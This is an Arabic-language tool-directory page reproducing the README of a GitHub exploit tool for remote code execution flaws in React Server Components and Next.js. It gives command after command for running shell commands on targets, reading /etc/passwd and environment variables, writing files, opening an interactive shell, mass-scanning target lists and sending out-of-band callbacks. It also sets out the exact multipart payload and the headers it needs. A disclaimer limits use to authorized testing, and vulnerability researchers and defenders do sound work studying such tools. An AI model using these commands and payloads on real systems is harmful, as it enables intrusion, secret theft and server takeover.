أدوات / GitHub / zemarkhos / cve-2025-55182-exploit-poc-scanner
zemarkhos/cve-2025-55182-exploit-poc-scanner
CVE-2025-55182-Exploit-PoC-Scanner أداة استغلال لـ CVE-2025-55182 و CVE-2025-66478 في React Server Components و Next.js، وتتميز بأدوات RCE وقراءة/كتابة الملفات واستدعاءات OOB وقشرة تفاعلية لاختبار الأمان المصرح به.
2 1 5 منذ 9 أشهراكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.
آخر 7 أيام آخر 30 يومًا
CVE-2025-55182 - أداة استغلال تنفيذ الأكواد عن بُعد لمكونات خادم React الإصدار 2.0
أداة بحث أمنية شاملة لاختبار الثغرات CVE-2025-55182 و CVE-2025-66478 في مكونات خادم React (RSC) وإجراءات خادم Next.js.
نظرة عامة على الثغرة
معرفات CVE CVE-2025-55182, CVE-2025-66478 درجة CVSS 10.0 (حرجة) الإصدارات المتأثرة React < 19.2.0، Next.js < 15.0.5 نوع الثغرة تنفيذ الأكواد عن بُعد (RCE) متجه الهجوم الشبكة
الميزات
مسح للثغرات بأسلوب PortSwigger مع حمولات كشف متعددة
أدوات استغلال RCE متعددة (execSync، spawnSync، vm.runInThisContext، إلخ)
اختبار استدعاء خارج النطاق (OOB) للتحقق من RCE الأعمى
إمكانية قراءة/كتابة الملفات
تنفيذ أكواد JavaScript
وضع شل تفاعلي
مسح جماعي مع تعدد الخيوط
دعم الوكيل (متوافق مع Burp Suite)
تنسيقات إخراج JSON/نصي
التثبيت
المتطلبات
إصدار Python
بدء سريع # فحص أساسي للثغرة
python3 exploit-custom.py -u https://target.com --check
# فحص شامل للثغرة (موصى به)
python3 exploit-custom.py -u https://target.com --scan
# مع وكيل (Burp Suite)
python3 exploit-custom.py -u https://target.com --scan -p http://127.0.0.1:8080
# اختبار استدعاء خارج النطاق (OOB)
python3 exploit-custom.py -u https://target.com --oob your-id.oastify.com
# تنفيذ أمر
python3 exploit-custom.py -u https://target.com --cmd "whoami"
# شل تفاعلي
python3 exploit-custom.py -u https://target.com --shell
الاستخدام
وسائط سطر الأوامر usage: exploit-custom.py [-h] (-u URL | -l URL_LIST) [-p PROXY] [-c COOKIES]
[-H HEADER] [-t THREADS] [--timeout TIMEOUT]
[--check] [--detect] [--scan] [--test-all]
[--oob HOST] [--cmd CMD] [--gadget GADGET]
[--read FILE] [--write FILE CONTENT] [--js JS]
[--shell] [-o OUTPUT] [-q]
اختيار الهدف الوسيطة الوصف مثال -u, --urlرابط هدف واحد -u https://target.com-l, --listملف يحتوي على روابط -l targets.txt
أوضاع المسح الوسيطة الوصف --detectكشف استخدام Next.js/RSC --checkفحص سريع للثغرة (اختبار رياضي) --scanفحص شامل للثغرة (بأسلوب PortSwigger) --test-allاختبار جميع الأدوات وحمولات الكشف
الاستغلال الوسيطة الوصف مثال --cmdتنفيذ أمر شل --cmd "id"--gadgetتحديد الأداة المستخدمة --gadget execSync--readقراءة ملف من الهدف --read /etc/passwd--writeكتابة ملف إلى الهدف --write /tmp/test.txt "content"--jsتنفيذ كود JavaScript --js "process.env"--shellبدء شل تفاعلي --shell--oobمضيف استدعاء خارج النطاق --oob xyz.oastify.com
خيارات الاتصال الوسيطة الوصف مثال -p, --proxyوكيل HTTP/HTTPS -p http://127.0.0.1:8080-c, --cookiesسلسلة ملفات تعريف الارتباط -c "session=abc123"-H, --headerرأس إضافي (قابل للتكرار) -H "X-Custom: value"-t, --threadsعدد الخيوط للمسح الجماعي -t 20--timeoutمهلة الطلب بالثواني --timeout 60
خيارات الإخراج الوسيطة الوصف -o, --outputحفظ النتائج في ملف (.json أو .txt) -q, --quietإخفاء الشعار
أمثلة المسح
هدف واحد # كشف Next.js و RSC
python3 exploit-custom.py -u https://target.com --detect
# فحص سريع للثغرة
python3 exploit-custom.py -u https://target.com --check
# فحص شامل مع جميع حمولات الكشف
python3 exploit-custom.py -u https://target.com --scan
# اختبار جميع الأدوات مع التحقق عبر OOB
python3 exploit-custom.py -u https://target.com --test-all --oob xyz.oastify.com
المسح الجماعي # مسح أهداف متعددة
python3 exploit-custom.py -l targets.txt --scan -o results.json
# مع زيادة الخيوط
python3 exploit-custom.py -l targets.txt --scan -t 20 -o results.json
# مع استدعاءات OOB
python3 exploit-custom.py -l targets.txt --oob xyz.oastify.com -o results.json
أمثلة الاستغلال
تنفيذ الأوامر # باستخدام الأداة الافتراضية (execSync)
python3 exploit-custom.py -u https://target.com --cmd "whoami"
# باستخدام أداة محددة
python3 exploit-custom.py -u https://target.com --cmd "id" --gadget spawnSync
python3 exploit-custom.py -u https://target.com --cmd "cat /etc/passwd" --gadget execFileSync
عمليات الملفات # قراءة ملف
python3 exploit-custom.py -u https://target.com --read /etc/passwd
python3 exploit-custom.py -u https://target.com --read /proc/self/environ
# كتابة ملف
python3 exploit-custom.py -u https://target.com --write /tmp/pwned.txt "pwned"
تنفيذ JavaScript # الحصول على متغيرات البيئة
python3 exploit-custom.py -u https://target.com --js "JSON.stringify(process.env)"
# الحصول على اسم المضيف
python3 exploit-custom.py -u https://target.com --js "require('os').hostname()"
# سرد الدليل
python3 exploit-custom.py -u https://target.com --js "require('fs').readdirSync('/')"
شل تفاعلي python3 exploit-custom.py -u https://target.com --shell
الأمر الوصف <command>تنفيذ أمر شل !read <file>قراءة ملف !write <file> <content>كتابة ملف !js <code>تنفيذ JavaScript !gadget <name>تبديل الأداة exitالخروج من الشل
الأدوات المتاحة
أدوات RCE الاسم معرف الوحدة الوصف execSyncchild_process#execSync تنفيذ أمر شل مباشر execFileSyncchild_process#execFileSync تنفيذ ملف ثنائي spawnSyncchild_process#spawnSync تشغيل عملية مع وسائط vm_runInThisContextvm#runInThisContext تنفيذ JS في السياق الحالي vm_runInNewContextvm#runInNewContext تنفيذ JS مع الهروب من الصندوق الرملي vm_runInThisContext_globalvm#runInThisContext تنفيذ عبر global.process
أدوات الملفات الاسم معرف الوحدة الوصف fs_readFileSyncfs#readFileSync قراءة الملفات التعسفية fs_writeFileSyncfs#writeFileSync كتابة الملفات التعسفية
أدوات OOB الاسم الوصف vm_fetchطلب HTTP عبر واجهة fetch (Node 18+) vm_httpطلب HTTP عبر وحدة http
حمولات الكشف (CVE-2025-66478) يستخدم وضع --scan حمولات الكشف بأسلوب PortSwigger التالية:
الحمولة الوصف property_referenceمرجع خاصية مفصول بنقطتين ["$1:a:a"] property_reference_v2مرجع بديل ["$1:b:b"] property_reference_constructorالوصول إلى المنشئ عبر مرجع خاصية property_reference_protoالوصول إلى سلسلة النموذج الأولي عبر مرجع خاصية action_ref_vmACTION_REF مع vm#runInThisContext action_ref_execSyncACTION_REF مع child_process#execSync
طرق استدعاء OOB تدعم الأداة عدة طرق لاستدعاء OOB:
الطريقة الوصف curlطلب HTTP عبر أمر curl wgetطلب HTTP عبر أمر wget nslookupاستعلام DNS pingاختبار الاتصال ICMP fetchواجهة fetch في Node.js httpوحدة http في Node.js
تفسير الإخراج
ألوان الطرفية اللون الحالة المعنى أخضر [VULN]ثغرة - تم تأكيد RCE أصفر [PATCH]تم التصحيح - إجراءات الخادم نشطة ولكن محمية أزرق [RSC]تم كشف إجراءات الخادم سماوي [NEXT]تم كشف Next.js أحمر [ERR]خطأ في الاتصال
نتائج المسح [VULN] property_reference تم كشف نمط ثغرة!
-> نمط الملخص: E{"digest"... (يحتاج تحقق OOB)
[SAFE] property_reference_v2 HTTP 200
[500] action_ref_vm digest:12345
تفاصيل تقنية
تنسيق رحلة RSC تقوم الأداة بتحليل استجابات "تنسيق الرحلة" لمكونات خادم React:
0:{"a":"$@1","b":"$@2"}
1:E{"digest":"12345"}
هيكل الحمولة متعددة الأجزاء ------CVE2025Boundary
Content-Disposition: form-data; name="$ACTION_REF_0"
------CVE2025Boundary
Content-Disposition: form-data; name="$ACTION_0:0"
{"id":"child_process#execSync","bound":["whoami"]}
------CVE2025Boundary--
رؤوس HTTP المطلوبة Content-Type: multipart/form-data; boundary=----CVE2025Boundary
Accept: text/x-component
Next-Action: <random-uuid>
RSC: 1
Next-Router-State-Tree: [[["",{"children":["__PAGE__",{}]},null,null,true]]
الإصدارات المصححة
React
Next.js
15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7
حالات الاستخدام
مكافآت الثغرات # 1. إعداد قائمة الأهداف
echo "https://app.example.com" > targets.txt
echo "https://api.example.com" >> targets.txt
# 2. مسح جماعي
python3 exploit-custom.py -l targets.txt --scan -o results.json
# 3. تحقق باستخدام OOB
python3 exploit-custom.py -u https://vuln.example.com --oob your-id.oastify.com
اختبار الاختراق # 1. كشف التقنية
python3 exploit-custom.py -u https://target.com --detect
# 2. تحليل باستخدام Burp
python3 exploit-custom.py -u https://target.com --scan -p http://127.0.0.1:8080
# 3. استغلال
python3 exploit-custom.py -u https://target.com --shell
المراجع
إخلاء المسؤولية القانوني تم توفير هذه الأداة لأغراض اختبار الأمن المصرح به والتعليم فقط.
تحذير: الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. استخدم هذه الأداة فقط على الأنظمة التي تمتلكها أو لديك إذن كتابي صريح لاختبارها.
المؤلفون غير مسؤولين عن أي استخدام خاطئ أو ضرر ناتج عن هذه الأداة.
الترخيص تم إصدار هذه الأداة لأغراض البحث الأمني واختبار الاختراق المصرح به.
المؤلف: Ünsal Furkan Harani
الإصدار: 2.0